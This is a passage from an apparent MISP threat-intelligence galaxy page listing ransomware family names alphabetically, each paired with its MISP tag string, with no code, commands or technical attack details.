The tag is: misp-galaxy:ransomware="Mikoyan"

MindLost

ransomware

The tag is: misp-galaxy:ransomware="MindLost"

MindSystem

ransomware

The tag is: misp-galaxy:ransomware="MindSystem"

Mini

ransomware

The tag is: misp-galaxy:ransomware="Mini"

Minotaur

ransomware

The tag is: misp-galaxy:ransomware="Minotaur"

MMM

ransomware

The tag is: misp-galaxy:ransomware="MMM"

MNS CryptoLocker

ransomware

The tag is: misp-galaxy:ransomware="MNS CryptoLocker"

MoneroPay

ransomware

The tag is: misp-galaxy:ransomware="MoneroPay"

MongoLock

ransomware

The tag is: misp-galaxy:ransomware="MongoLock"

MoonCryptor

ransomware

The tag is: misp-galaxy:ransomware="MoonCryptor"

Mordor

ransomware

The tag is: misp-galaxy:ransomware="Mordor"

MorrisBatchCrypt

ransomware

The tag is: misp-galaxy:ransomware="MorrisBatchCrypt"

Moth

ransomware

The tag is: misp-galaxy:ransomware="Moth"

MoWare H.F.D

ransomware

The tag is: misp-galaxy:ransomware="MoWare H.F.D"

Mr.Locker

ransomware

The tag is: misp-galaxy:ransomware="Mr.Locker"

Mr403Forbidden

ransomware

The tag is: misp-galaxy:ransomware="Mr403Forbidden"

MuchLove

ransomware

The tag is: misp-galaxy:ransomware="MuchLove"

Muhstik

ransomware

The tag is: misp-galaxy:ransomware="Muhstik"

Mystic

ransomware

The tag is: misp-galaxy:ransomware="Mystic"

MZP

ransomware

The tag is: misp-galaxy:ransomware="MZP"

N2019cov

ransomware

The tag is: misp-galaxy:ransomware="N2019cov"

Naampa

ransomware

The tag is: misp-galaxy:ransomware="Naampa"

NazCrypt

ransomware

The tag is: misp-galaxy:ransomware="NazCrypt"

Nefilim

ransomware

The tag is: misp-galaxy:ransomware="Nefilim"

Negozl

ransomware

The tag is: misp-galaxy:ransomware="Negozl"

Neitrino

ransomware

The tag is: misp-galaxy:ransomware="Neitrino"

NewWave

ransomware

The tag is: misp-galaxy:ransomware="NewWave"

NextCry

ransomware

The tag is: misp-galaxy:ransomware="NextCry"

Nightmare

ransomware

The tag is: misp-galaxy:ransomware="Nightmare"

NinjaLoc

ransomware

The tag is: misp-galaxy:ransomware="NinjaLoc"

NM4

ransomware

The tag is: misp-galaxy:ransomware="NM4"

Noblis

ransomware

The tag is: misp-galaxy:ransomware="Noblis"

Nog4yH4n

ransomware

The tag is: misp-galaxy:ransomware="Nog4yH4n"

Nomikon

ransomware

The tag is: misp-galaxy:ransomware="Nomikon"

NotAHero

ransomware

The tag is: misp-galaxy:ransomware="NotAHero"

Nozelesn

ransomware

The tag is: misp-galaxy:ransomware="Nozelesn"

Nulltica

ransomware

The tag is: misp-galaxy:ransomware="Nulltica"

Nx / OSR

ransomware

The tag is: misp-galaxy:ransomware="Nx / OSR"

Nyton

ransomware

The tag is: misp-galaxy:ransomware="Nyton"

NZMR

ransomware

The tag is: misp-galaxy:ransomware="NZMR"

Ogre

ransomware

The tag is: misp-galaxy:ransomware="Ogre"

OhNo!

ransomware

The tag is: misp-galaxy:ransomware="OhNo!"

Oled

ransomware

The tag is: misp-galaxy:ransomware="Oled"

OmniSphere

ransomware

The tag is: misp-galaxy:ransomware="OmniSphere"

One

ransomware

The tag is: misp-galaxy:ransomware="One"

ONI

ransomware

The tag is: misp-galaxy:ransomware="ONI"

OoPS Ramenware

ransomware

The tag is: misp-galaxy:ransomware="OoPS Ramenware"

OopsLocker

ransomware

The tag is: misp-galaxy:ransomware="OopsLocker"

OPdailyallowance

ransomware

The tag is: misp-galaxy:ransomware="OPdailyallowance"

OpenToYou

ransomware

The tag is: misp-galaxy:ransomware="OpenToYou"

Ordinal

ransomware

The tag is: misp-galaxy:ransomware="Ordinal"

Ordinypt

ransomware

The tag is: misp-galaxy:ransomware="Ordinypt"

Pacman

ransomware

The tag is: misp-galaxy:ransomware="Pacman"

PassLock

ransomware

The tag is: misp-galaxy:ransomware="PassLock"

Pay-or-Lost

ransomware

The tag is: misp-galaxy:ransomware="Pay-or-Lost"

PayForNature

ransomware

The tag is: misp-galaxy:ransomware="PayForNature"

Paymen45

ransomware

The tag is: misp-galaxy:ransomware="Paymen45"

Payment

ransomware

The tag is: misp-galaxy:ransomware="Payment"

PClock и PClock2

ransomware

The tag is: misp-galaxy:ransomware="PClock и PClock2"

PPDDDP

ransomware

The tag is: misp-galaxy:ransomware="PPDDDP"

PEC 2017

ransomware

The tag is: misp-galaxy:ransomware="PEC 2017"

Pendor

ransomware

The tag is: misp-galaxy:ransomware="Pendor"

Pennywise

ransomware

The tag is: misp-galaxy:ransomware="Pennywise"

PewCrypt +decrypt

ransomware

The tag is: misp-galaxy:ransomware="PewCrypt +decrypt"

PewDiePie

ransomware

The tag is: misp-galaxy:ransomware="PewDiePie"

PhobosImposter

ransomware

The tag is: misp-galaxy:ransomware="PhobosImposter"

PhoneNumber

ransomware

The tag is: misp-galaxy:ransomware="PhoneNumber"

PHP

ransomware

The tag is: misp-galaxy:ransomware="PHP"

Pirateware

ransomware

The tag is: misp-galaxy:ransomware="Pirateware"

PoisonFang

ransomware

The tag is: misp-galaxy:ransomware="PoisonFang"

PonyFinal

ransomware

The tag is: misp-galaxy:ransomware="PonyFinal"

PooleZoor

ransomware

The tag is: misp-galaxy:ransomware="PooleZoor"

PopCornTime

ransomware

The tag is: misp-galaxy:ransomware="PopCornTime"

PowerHentai

ransomware

The tag is: misp-galaxy:ransomware="PowerHentai"

PowerLocky

ransomware

The tag is: misp-galaxy:ransomware="PowerLocky"

PowerShell Locker 2013

ransomware

The tag is: misp-galaxy:ransomware="PowerShell Locker 2013"

PowerShell Locker 2015

ransomware

The tag is: misp-galaxy:ransomware="PowerShell Locker 2015"

Pr0tector

ransomware

The tag is: misp-galaxy:ransomware="Pr0tector"

Predator

ransomware

The tag is: misp-galaxy:ransomware="Predator"

Priapos

ransomware

The tag is: misp-galaxy:ransomware="Priapos"

Project23

ransomware

The tag is: misp-galaxy:ransomware="Project23"

Project57

ransomware

The tag is: misp-galaxy:ransomware="Project57"

ProLock

ransomware

The tag is: misp-galaxy:ransomware="ProLock"

Prometey

ransomware

The tag is: misp-galaxy:ransomware="Prometey"

Protected

ransomware

The tag is: misp-galaxy:ransomware="Protected"

PSCrypt

ransomware

The tag is: misp-galaxy:ransomware="PSCrypt"

PshCrypt

ransomware

The tag is: misp-galaxy:ransomware="PshCrypt"

PTP

ransomware

The tag is: misp-galaxy:ransomware="PTP"

Pulpy

ransomware

The tag is: misp-galaxy:ransomware="Pulpy"

PureLocker

ransomware

The tag is: misp-galaxy:ransomware="PureLocker"

PwndLocker

ransomware

The tag is: misp-galaxy:ransomware="PwndLocker"

PyteHole

ransomware

The tag is: misp-galaxy:ransomware="PyteHole"

Python

ransomware

The tag is: misp-galaxy:ransomware="Python"

PZDC

ransomware

The tag is: misp-galaxy:ransomware="PZDC"

Qinynore

ransomware

The tag is: misp-galaxy:ransomware="Qinynore"

QNAPCrypt

ransomware

The tag is: misp-galaxy:ransomware="QNAPCrypt"

QP

ransomware

The tag is: misp-galaxy:ransomware="QP"

QuakeWay

ransomware

The tag is: misp-galaxy:ransomware="QuakeWay"

Qweuirtksd

ransomware

The tag is: misp-galaxy:ransomware="Qweuirtksd"

R3store

ransomware

The tag is: misp-galaxy:ransomware="R3store"

RabbitFox

ransomware

The tag is: misp-galaxy:ransomware="RabbitFox"

Ramsey

ransomware

The tag is: misp-galaxy:ransomware="Ramsey"

RandomLocker

ransomware

The tag is: misp-galaxy:ransomware="RandomLocker"

RanRans

ransomware

The tag is: misp-galaxy:ransomware="RanRans"

Rans0mLocked

ransomware

The tag is: misp-galaxy:ransomware="Rans0mLocked"

Ransed

ransomware

The tag is: misp-galaxy:ransomware="Ransed"

Ransom102

ransomware

The tag is: misp-galaxy:ransomware="Ransom102"

RansomAES

ransomware

The tag is: misp-galaxy:ransomware="RansomAES"

RansomCuck

ransomware

The tag is: misp-galaxy:ransomware="RansomCuck"

RansomMine

ransomware

The tag is: misp-galaxy:ransomware="RansomMine"

Ransomnix

ransomware

The tag is: misp-galaxy:ransomware="Ransomnix"

Ransom Prank

ransomware

The tag is: misp-galaxy:ransomware="Ransom Prank"

RansomUserLocker

ransomware

The tag is: misp-galaxy:ransomware="RansomUserLocker"

RansomWarrior

ransomware

The tag is: misp-galaxy:ransomware="RansomWarrior"

Rapid

ransomware

The tag is: misp-galaxy:ransomware="Rapid"

Rapid 2.0

ransomware

The tag is: misp-galaxy:ransomware="Rapid 2.0"

Rapid 3.0

ransomware

The tag is: misp-galaxy:ransomware="Rapid 3.0"

Rapid-Gillette

ransomware

The tag is: misp-galaxy:ransomware="Rapid-Gillette"

Ra

ransomware

The tag is: misp-galaxy:ransomware="Ra"

RaRuCrypt

ransomware

The tag is: misp-galaxy:ransomware="RaRuCrypt"

RedBoot

ransomware

The tag is: misp-galaxy:ransomware="RedBoot"

Redkeeper

ransomware

The tag is: misp-galaxy:ransomware="Redkeeper"

RedFox

ransomware

The tag is: misp-galaxy:ransomware="RedFox"

RedRum

ransomware

The tag is: misp-galaxy:ransomware="RedRum"

Redshot

ransomware

The tag is: misp-galaxy:ransomware="Redshot"

Reetner

ransomware

The tag is: misp-galaxy:ransomware="Reetner"

RekenSom

ransomware

The tag is: misp-galaxy:ransomware="RekenSom"

Relock

ransomware

The tag is: misp-galaxy:ransomware="Relock"

RensenWare

ransomware

The tag is: misp-galaxy:ransomware="RensenWare"

Rentyr

ransomware

The tag is: misp-galaxy:ransomware="Rentyr"

RestoLocker

ransomware

The tag is: misp-galaxy:ransomware="RestoLocker"

Resurrection

ransomware

The tag is: misp-galaxy:ransomware="Resurrection"

Retis

ransomware

The tag is: misp-galaxy:ransomware="Retis"

RetMyData

ransomware

The tag is: misp-galaxy:ransomware="RetMyData"

Revolution

ransomware

The tag is: misp-galaxy:ransomware="Revolution"

Reyptson

ransomware

The tag is: misp-galaxy:ransomware="Reyptson"

Rhino

ransomware

The tag is: misp-galaxy:ransomware="Rhino"

Rijndael

ransomware

The tag is: misp-galaxy:ransomware="Rijndael"

Rogue HT

ransomware

The tag is: misp-galaxy:ransomware="Rogue HT"

Rontok

ransomware

The tag is: misp-galaxy:ransomware="Rontok"

Rozlok

ransomware

The tag is: misp-galaxy:ransomware="Rozlok"

RSA-NI

ransomware

The tag is: misp-galaxy:ransomware="RSA-NI"

RSA2048Pro

ransomware

The tag is: misp-galaxy:ransomware="RSA2048Pro"

Ruby

ransomware

The tag is: misp-galaxy:ransomware="Ruby"

Rush

ransomware

The tag is: misp-galaxy:ransomware="Rush"

Russenger

ransomware

The tag is: misp-galaxy:ransomware="Russenger"

Russian EDA2

ransomware

The tag is: misp-galaxy:ransomware="Russian EDA2"

SAD

ransomware

The tag is: misp-galaxy:ransomware="SAD"

SadComputer

ransomware

The tag is: misp-galaxy:ransomware="SadComputer"

Sadogo

ransomware

The tag is: misp-galaxy:ransomware="Sadogo"

Salsa

ransomware

The tag is: misp-galaxy:ransomware="Salsa"

Santa Encryptor

ransomware

The tag is: misp-galaxy:ransomware="Santa Encryptor"

Saramat

ransomware

The tag is: misp-galaxy:ransomware="Saramat"

SARansom

ransomware

The tag is: misp-galaxy:ransomware="SARansom"

Satan Cryptor 2.0

ransomware

The tag is: misp-galaxy:ransomware="Satan Cryptor 2.0"

Satan’s Doom Crypter

ransomware

The tag is: misp-galaxy:ransomware="Satan’s Doom Crypter"

SatanCryptor Go

ransomware

The tag is: misp-galaxy:ransomware="SatanCryptor Go"

Saturn

ransomware

The tag is: misp-galaxy:ransomware="Saturn"

Satyr

ransomware

The tag is: misp-galaxy:ransomware="Satyr"

SaveTheQueen

ransomware

The tag is: misp-galaxy:ransomware="SaveTheQueen"

ScammerLocker HT

ransomware

The tag is: misp-galaxy:ransomware="ScammerLocker HT"

ScammerLocker Ph

ransomware

The tag is: misp-galaxy:ransomware="ScammerLocker Ph"

Schwerer

ransomware

The tag is: misp-galaxy:ransomware="Schwerer"

ScorpionLocker

ransomware

The tag is: misp-galaxy:ransomware="ScorpionLocker"

Scrabber

ransomware

The tag is: misp-galaxy:ransomware="Scrabber"

Scroboscope

ransomware

The tag is: misp-galaxy:ransomware="Scroboscope"

SecretSystem

ransomware

The tag is: misp-galaxy:ransomware="SecretSystem"

SecureCryptor

ransomware

The tag is: misp-galaxy:ransomware="SecureCryptor"

SeginChile

ransomware

The tag is: misp-galaxy:ransomware="SeginChile"

SEND.ID.TO

ransomware

The tag is: misp-galaxy:ransomware="SEND.ID.TO"

Seon

ransomware

The tag is: misp-galaxy:ransomware="Seon"

Sepsis

ransomware

The tag is: misp-galaxy:ransomware="Sepsis"

SepSys

ransomware

The tag is: misp-galaxy:ransomware="SepSys"

Shadi

ransomware

The tag is: misp-galaxy:ransomware="Shadi"

ShadowCryptor

ransomware

The tag is: misp-galaxy:ransomware="ShadowCryptor"

ShinigamiLocker

ransomware

The tag is: misp-galaxy:ransomware="ShinigamiLocker"

ShkolotaCrypt

ransomware

The tag is: misp-galaxy:ransomware="ShkolotaCrypt"

Shrug

ransomware

The tag is: misp-galaxy:ransomware="Shrug"

Shutdown57

ransomware

The tag is: misp-galaxy:ransomware="Shutdown57"

ShutUpAndDance

ransomware

The tag is: misp-galaxy:ransomware="ShutUpAndDance"

Sifreli 2017

ransomware

The tag is: misp-galaxy:ransomware="Sifreli 2017"

Sifreli 2019

ransomware

The tag is: misp-galaxy:ransomware="Sifreli 2019"

SifreCozucu

ransomware

The tag is: misp-galaxy:ransomware="SifreCozucu"

SilentSpring

ransomware

The tag is: misp-galaxy:ransomware="SilentSpring"

SintaLocker

ransomware

The tag is: misp-galaxy:ransomware="SintaLocker"

Skull

ransomware

The tag is: misp-galaxy:ransomware="Skull"

Skull HT

ransomware

The tag is: misp-galaxy:ransomware="Skull HT"

SkyStars

ransomware

The tag is: misp-galaxy:ransomware="SkyStars"

SlankCryptor

ransomware

The tag is: misp-galaxy:ransomware="SlankCryptor"

Snake-Ekans

ransomware

The tag is: misp-galaxy:ransomware="Snake-Ekans"

SnakeLocker

ransomware

The tag is: misp-galaxy:ransomware="SnakeLocker"

Snatch

ransomware

The tag is: misp-galaxy:ransomware="Snatch"

SnowPicnic

ransomware

The tag is: misp-galaxy:ransomware="SnowPicnic"

SoFucked

ransomware

The tag is: misp-galaxy:ransomware="SoFucked"

SOLO

ransomware

The tag is: misp-galaxy:ransomware="SOLO"

Somik1

ransomware

The tag is: misp-galaxy:ransomware="Somik1"

Sorry HT

ransomware

The tag is: misp-galaxy:ransomware="Sorry HT"

SpartCrypt

ransomware

The tag is: misp-galaxy:ransomware="SpartCrypt"

Spectre

ransomware

The tag is: misp-galaxy:ransomware="Spectre"

Sphinx

ransomware

The tag is: misp-galaxy:ransomware="Sphinx"

Spiteful Doubletake

ransomware

The tag is: misp-galaxy:ransomware="Spiteful Doubletake"

SpongeBob

ransomware

The tag is: misp-galaxy:ransomware="SpongeBob"

StalinLocker

ransomware

The tag is: misp-galaxy:ransomware="StalinLocker"

Stinger

ransomware

The tag is: misp-galaxy:ransomware="Stinger"

Storm

ransomware

The tag is: misp-galaxy:ransomware="Storm"

StrawHat

ransomware

The tag is: misp-galaxy:ransomware="StrawHat"

Streamer

ransomware

The tag is: misp-galaxy:ransomware="Streamer"

Striked

ransomware

The tag is: misp-galaxy:ransomware="Striked"

Stroman

ransomware

The tag is: misp-galaxy:ransomware="Stroman"

Stupid

ransomware

The tag is: misp-galaxy:ransomware="Stupid"

StupidJapan

ransomware

The tag is: misp-galaxy:ransomware="StupidJapan"

Styver

ransomware

The tag is: misp-galaxy:ransomware="Styver"

Styx

ransomware

The tag is: misp-galaxy:ransomware="Styx"

SuperB

ransomware

The tag is: misp-galaxy:ransomware="SuperB"

SuperCrypt

ransomware

The tag is: misp-galaxy:ransomware="SuperCrypt"

Suri

ransomware

The tag is: misp-galaxy:ransomware="Suri"

Symbiom

ransomware

The tag is: misp-galaxy:ransomware="Symbiom"

SymmyWare

ransomware

The tag is: misp-galaxy:ransomware="SymmyWare"

Syrk

ransomware

The tag is: misp-galaxy:ransomware="Syrk"

SYSDOWN

ransomware

The tag is: misp-galaxy:ransomware="SYSDOWN"

SystemCrypter

ransomware

The tag is: misp-galaxy:ransomware="SystemCrypter"

T1Happy

ransomware

The tag is: misp-galaxy:ransomware="T1Happy"

Takahiro Locker

ransomware

The tag is: misp-galaxy:ransomware="Takahiro Locker"

TBHRanso

ransomware

The tag is: misp-galaxy:ransomware="TBHRanso"

Teamo

ransomware

The tag is: misp-galaxy:ransomware="Teamo"

Tear Dr0p

ransomware

The tag is: misp-galaxy:ransomware="Tear Dr0p"

Technicy

ransomware

The tag is: misp-galaxy:ransomware="Technicy"

TeslaWare

ransomware

The tag is: misp-galaxy:ransomware="TeslaWare"

TFlower

ransomware

The tag is: misp-galaxy:ransomware="TFlower"

The Brotherhood

ransomware

The tag is: misp-galaxy:ransomware="The Brotherhood"

The Magic

ransomware

The tag is: misp-galaxy:ransomware="The Magic"

TheCursedMurderer

ransomware

The tag is: misp-galaxy:ransomware="TheCursedMurderer"

TheDarkEncryptor

ransomware

The tag is: misp-galaxy:ransomware="TheDarkEncryptor"

Thor

ransomware

The tag is: misp-galaxy:ransomware="Thor"

THT

ransomware

The tag is: misp-galaxy:ransomware="THT"

ThunderCrypt

ransomware

The tag is: misp-galaxy:ransomware="ThunderCrypt"

Tk

ransomware

The tag is: misp-galaxy:ransomware="Tk"

Torchwood

ransomware

The tag is: misp-galaxy:ransomware="Torchwood"

TorLocker

ransomware

The tag is: misp-galaxy:ransomware="TorLocker"

TotalWipeOut

ransomware

The tag is: misp-galaxy:ransomware="TotalWipeOut"

TPS1.0

ransomware

The tag is: misp-galaxy:ransomware="TPS1.0"

Trick-Or-Treat

ransomware

The tag is: misp-galaxy:ransomware="Trick-Or-Treat"

Trojan-Syria

ransomware

The tag is: misp-galaxy:ransomware="Trojan-Syria"

TrumpHead

ransomware

The tag is: misp-galaxy:ransomware="TrumpHead"

TurkStatik

ransomware

The tag is: misp-galaxy:ransomware="TurkStatik"

Tyrant

ransomware

The tag is: misp-galaxy:ransomware="Tyrant"

UCCU

ransomware

The tag is: misp-galaxy:ransomware="UCCU"

Ukash

ransomware

The tag is: misp-galaxy:ransomware="Ukash"

Ultimo HT

ransomware

The tag is: misp-galaxy:ransomware="Ultimo HT"

UltraCrypter

ransomware

The tag is: misp-galaxy:ransomware="UltraCrypter"

Unikey

ransomware

The tag is: misp-galaxy:ransomware="Unikey"

Unknown Crypted

ransomware

The tag is: misp-galaxy:ransomware="Unknown Crypted"

Unknown Lock

ransomware

The tag is: misp-galaxy:ransomware="Unknown Lock"

Unknown XTBL

ransomware

The tag is: misp-galaxy:ransomware="Unknown XTBL"

Unlckr

ransomware

The tag is: misp-galaxy:ransomware="Unlckr"

UNNAM3D

ransomware

The tag is: misp-galaxy:ransomware="UNNAM3D"

Unnamed Bin

ransomware

The tag is: misp-galaxy:ransomware="Unnamed Bin"

Unrans

ransomware

The tag is: misp-galaxy:ransomware="Unrans"

UselessDisk

ransomware

The tag is: misp-galaxy:ransomware="UselessDisk"

UselessFiles

ransomware

The tag is: misp-galaxy:ransomware="UselessFiles"

USR0

ransomware

The tag is: misp-galaxy:ransomware="USR0"

Vaca

ransomware

The tag is: misp-galaxy:ransomware="Vaca"

VCrypt

ransomware

The tag is: misp-galaxy:ransomware="VCrypt"

vCrypt1

ransomware

The tag is: misp-galaxy:ransomware="vCrypt1"

VegaLocker

ransomware

The tag is: misp-galaxy:ransomware="VegaLocker"

Velso

ransomware

The tag is: misp-galaxy:ransomware="Velso"

Vendetta

ransomware

The tag is: misp-galaxy:ransomware="Vendetta"

VevoLocker

ransomware

The tag is: misp-galaxy:ransomware="VevoLocker"

VHD

ransomware

The tag is: misp-galaxy:ransomware="VHD"

ViACrypt

ransomware

The tag is: misp-galaxy:ransomware="ViACrypt"

Viagra

ransomware

The tag is: misp-galaxy:ransomware="Viagra"

VideoBelle

ransomware

The tag is: misp-galaxy:ransomware="VideoBelle"

ViiperWare

ransomware

The tag is: misp-galaxy:ransomware="ViiperWare"

Viro

ransomware

The tag is: misp-galaxy:ransomware="Viro"

ViroBotnet

ransomware

The tag is: misp-galaxy:ransomware="ViroBotnet"

VisionCrypt

ransomware

The tag is: misp-galaxy:ransomware="VisionCrypt"

VMola

ransomware

The tag is: misp-galaxy:ransomware="VMola"

VoidCrypt

ransomware

The tag is: misp-galaxy:ransomware="VoidCrypt"

Vulston

ransomware

The tag is: misp-galaxy:ransomware="Vulston"

Waffle

ransomware

The tag is: misp-galaxy:ransomware="Waffle"

Waiting

ransomware

The tag is: misp-galaxy:ransomware="Waiting"

Waldo

ransomware

The tag is: misp-galaxy:ransomware="Waldo"

Wanna Decryptor Portuguese

ransomware

The tag is: misp-galaxy:ransomware="Wanna Decryptor Portuguese"

WannabeHappy

ransomware

The tag is: misp-galaxy:ransomware="WannabeHappy"

WannaCash

ransomware

The tag is: misp-galaxy:ransomware="WannaCash"

WannaDie

ransomware

The tag is: misp-galaxy:ransomware="WannaDie"

WannaPeace

ransomware

The tag is: misp-galaxy:ransomware="WannaPeace"

WannaSpam

ransomware

The tag is: misp-galaxy:ransomware="WannaSpam"

Want Money

ransomware

The tag is: misp-galaxy:ransomware="Want Money"

Wesker

ransomware

The tag is: misp-galaxy:ransomware="Wesker"

WhatAFuck

ransomware

The tag is: misp-galaxy:ransomware="WhatAFuck"

WhyCry

ransomware

The tag is: misp-galaxy:ransomware="WhyCry"

Windows10

ransomware

The tag is: misp-galaxy:ransomware="Windows10"

WininiCrypt

ransomware

The tag is: misp-galaxy:ransomware="WininiCrypt"

Winsecure

ransomware

The tag is: misp-galaxy:ransomware="Winsecure"

WinUpdatesDisabler

ransomware

The tag is: misp-galaxy:ransomware="WinUpdatesDisabler"

WTDI

ransomware

The tag is: misp-galaxy:ransomware="WTDI"

X Locker 5.0

ransomware

The tag is: misp-galaxy:ransomware="X Locker 5.0"

XCry

ransomware

The tag is: misp-galaxy:ransomware="XCry"

XD

ransomware

The tag is: misp-galaxy:ransomware="XD"

XData

ransomware

The tag is: misp-galaxy:ransomware="XData"

XeroWare

ransomware

The tag is: misp-galaxy:ransomware="XeroWare"

Xlockr

ransomware

The tag is: misp-galaxy:ransomware="Xlockr"

XmdXtazX

ransomware

The tag is: misp-galaxy:ransomware="XmdXtazX"

Xncrypt

ransomware

The tag is: misp-galaxy:ransomware="Xncrypt"

XRat

ransomware

The tag is: misp-galaxy:ransomware="XRat"

XyuEncrypt

ransomware

The tag is: misp-galaxy:ransomware="XyuEncrypt"

xXLecXx

ransomware

The tag is: misp-galaxy:ransomware="xXLecXx"

Yatron

ransomware

The tag is: misp-galaxy:ransomware="Yatron"

Yoshikada

ransomware

The tag is: misp-galaxy:ransomware="Yoshikada"

YYYYBJQOQDU

ransomware

The tag is: misp-galaxy:ransomware="YYYYBJQOQDU"

ZariqaCrypt

ransomware

The tag is: misp-galaxy:ransomware="ZariqaCrypt"

Zelta Free

ransomware

The tag is: misp-galaxy:ransomware="Zelta Free"

ZenCrypt

ransomware

The tag is: misp-galaxy:ransomware="ZenCrypt"

Zeoticus

ransomware

The tag is: misp-galaxy:ransomware="Zeoticus"

Zeppelin

ransomware

The tag is: misp-galaxy:ransomware="Zeppelin"

Zero-Fucks

ransomware

The tag is: misp-galaxy:ransomware="Zero-Fucks"

ZeroLocker

ransomware

The tag is: misp-galaxy:ransomware="ZeroLocker"

Zeronine

ransomware

The tag is: misp-galaxy:ransomware="Zeronine"

ZeroRansom

ransomware

The tag is: misp-galaxy:ransomware="ZeroRansom"

Zilla

ransomware

The tag is: misp-galaxy:ransomware="Zilla"

ZimbraCryptor

ransomware

The tag is: misp-galaxy:ransomware="ZimbraCryptor"

ZipLocker

ransomware

The tag is: misp-galaxy:ransomware="ZipLocker"

Zipper

ransomware

The tag is: misp-galaxy:ransomware="Zipper"

Zoldon

ransomware

The tag is: misp-galaxy:ransomware="Zoldon"

ZorgoCry

ransomware

The tag is: misp-galaxy:ransomware="ZorgoCry"

Smaug

ransomware

The tag is: misp-galaxy:ransomware="Smaug"

GammA

ransomware

The tag is: misp-galaxy:ransomware="GammA"

BlackMoon

ransomware

The tag is: misp-galaxy:ransomware="BlackMoon"

MilkmanVictory

ransomware

The tag is: misp-galaxy:ransomware="MilkmanVictory"

Dragoncyber

ransomware

The tag is: misp-galaxy:ransomware="Dragoncyber"

Solider

ransomware

The tag is: misp-galaxy:ransomware="Solider"

Biglock

ransomware

The tag is: misp-galaxy:ransomware="Biglock"

Immuni

ransomware

The tag is: misp-galaxy:ransomware="Immuni"

Black claw

ransomware

The tag is: misp-galaxy:ransomware="Black claw"

Banks1

ransomware

The tag is: misp-galaxy:ransomware="Banks1"

UnluckyWare

ransomware

The tag is: misp-galaxy:ransomware="UnluckyWare"

Zorab

ransomware

The tag is: misp-galaxy:ransomware="Zorab"

FonixCrypter

ransomware

The tag is: misp-galaxy:ransomware="FonixCrypter"

LickyAgent

ransomware

The tag is: misp-galaxy:ransomware="LickyAgent"

Avaddon

ransomware

The tag is: misp-galaxy:ransomware="Avaddon"

DualShot

ransomware

The tag is: misp-galaxy:ransomware="DualShot"

RNS

ransomware

The tag is: misp-galaxy:ransomware="RNS"

Such_Crypt

ransomware

The tag is: misp-galaxy:ransomware="Such_Crypt"

20dfs

ransomware

The tag is: misp-galaxy:ransomware="20dfs"

CryDroid

ransomware

The tag is: misp-galaxy:ransomware="CryDroid"

TomNom

ransomware

The tag is: misp-galaxy:ransomware="TomNom"

Yogynicof

ransomware

The tag is: misp-galaxy:ransomware="Yogynicof"

CobraLocker

ransomware

The tag is: misp-galaxy:ransomware="CobraLocker"

PL

ransomware

The tag is: misp-galaxy:ransomware="PL"

CryCryptor

ransomware

The tag is: misp-galaxy:ransomware="CryCryptor"

Blocky

ransomware

The tag is: misp-galaxy:ransomware="Blocky"

OhNo-FakePDF

ransomware

The tag is: misp-galaxy:ransomware="OhNo-FakePDF"

Try2Cry

ransomware

The tag is: misp-galaxy:ransomware="Try2Cry"

LolKek

ransomware

The tag is: misp-galaxy:ransomware="LolKek"

FlowEncrypt

ransomware

The tag is: misp-galaxy:ransomware="FlowEncrypt"

WhoLocker

ransomware

The tag is: misp-galaxy:ransomware="WhoLocker"

Pojie

ransomware

The tag is: misp-galaxy:ransomware="Pojie"

Aris Locker

ransomware

The tag is: misp-galaxy:ransomware="Aris Locker"

EduRansom

ransomware

The tag is: misp-galaxy:ransomware="EduRansom"

Fastwind

ransomware

The tag is: misp-galaxy:ransomware="Fastwind"

Silvertor

ransomware

The tag is: misp-galaxy:ransomware="Silvertor"

Exorcist

ransomware

The tag is: misp-galaxy:ransomware="Exorcist"

WyvernLocker

ransomware

The tag is: misp-galaxy:ransomware="WyvernLocker"

Ensiko

ransomware

The tag is: misp-galaxy:ransomware="Ensiko"

Django

ransomware

The tag is: misp-galaxy:ransomware="Django"

RansomBlox

ransomware

The tag is: misp-galaxy:ransomware="RansomBlox"

BitRansomware

ransomware

The tag is: misp-galaxy:ransomware="BitRansomware"

AESMew

ransomware

The tag is: misp-galaxy:ransomware="AESMew"

DeathOfShadow

ransomware

The tag is: misp-galaxy:ransomware="DeathOfShadow"

XMRLocker

ransomware

The tag is: misp-galaxy:ransomware="XMRLocker"

WinWord64

ransomware

The tag is: misp-galaxy:ransomware="WinWord64"

ThunderX

ransomware

The tag is: misp-galaxy:ransomware="ThunderX"

Mountlocket

ransomware

The tag is: misp-galaxy:ransomware="Mountlocket"

Gladius

ransomware

The tag is: misp-galaxy:ransomware="Gladius"

Cyrat

ransomware

The tag is: misp-galaxy:ransomware="Cyrat"

Crypt32

ransomware

The tag is: misp-galaxy:ransomware="Crypt32"

BizHack

ransomware

The tag is: misp-galaxy:ransomware="BizHack"

Geneve

ransomware

The tag is: misp-galaxy:ransomware="Geneve"

Z3

ransomware

The tag is: misp-galaxy:ransomware="Z3"

Leakthemall

ransomware

The tag is: misp-galaxy:ransomware="Leakthemall"

Conti

ransomware

The tag is: misp-galaxy:ransomware="Conti"

Makop

ransomware

The tag is: misp-galaxy:ransomware="Makop"

Best Crypt

ransomware

The tag is: misp-galaxy:ransomware="Best Crypt"

Consciousness

ransomware

The tag is: misp-galaxy:ransomware="Consciousness"

Flamingo

ransomware

The tag is: misp-galaxy:ransomware="Flamingo"

PewPew

ransomware

The tag is: misp-galaxy:ransomware="PewPew"

DogeCrypt

ransomware

The tag is: misp-galaxy:ransomware="DogeCrypt"

Badbeeteam

ransomware

The tag is: misp-galaxy:ransomware="Badbeeteam"

Solve

ransomware

The tag is: misp-galaxy:ransomware="Solve"

RenameX12

ransomware

The tag is: misp-galaxy:ransomware="RenameX12"

Zhen

ransomware

The tag is: misp-galaxy:ransomware="Zhen"

Datacloud

ransomware

The tag is: misp-galaxy:ransomware="Datacloud"

Ironcat

ransomware

The tag is: misp-galaxy:ransomware="Ironcat"

Dusk

ransomware

The tag is: misp-galaxy:ransomware="Dusk"

Cutekitty

ransomware

The tag is: misp-galaxy:ransomware="Cutekitty"

Babax

ransomware

The tag is: misp-galaxy:ransomware="Babax"

Eyecry

ransomware

The tag is: misp-galaxy:ransomware="Eyecry"

Osno

ransomware

The tag is: misp-galaxy:ransomware="Osno"

Loki

ransomware

The tag is: misp-galaxy:ransomware="Loki"

WoodRat

ransomware

The tag is: misp-galaxy:ransomware="WoodRat"

Curator

ransomware

The tag is: misp-galaxy:ransomware="Curator"

32aa

ransomware

The tag is: misp-galaxy:ransomware="32aa"

Vaggen

ransomware

The tag is: misp-galaxy:ransomware="Vaggen"

Clay

ransomware

The tag is: misp-galaxy:ransomware="Clay"

Pizhon

ransomware

The tag is: misp-galaxy:ransomware="Pizhon"

InstallPay

ransomware

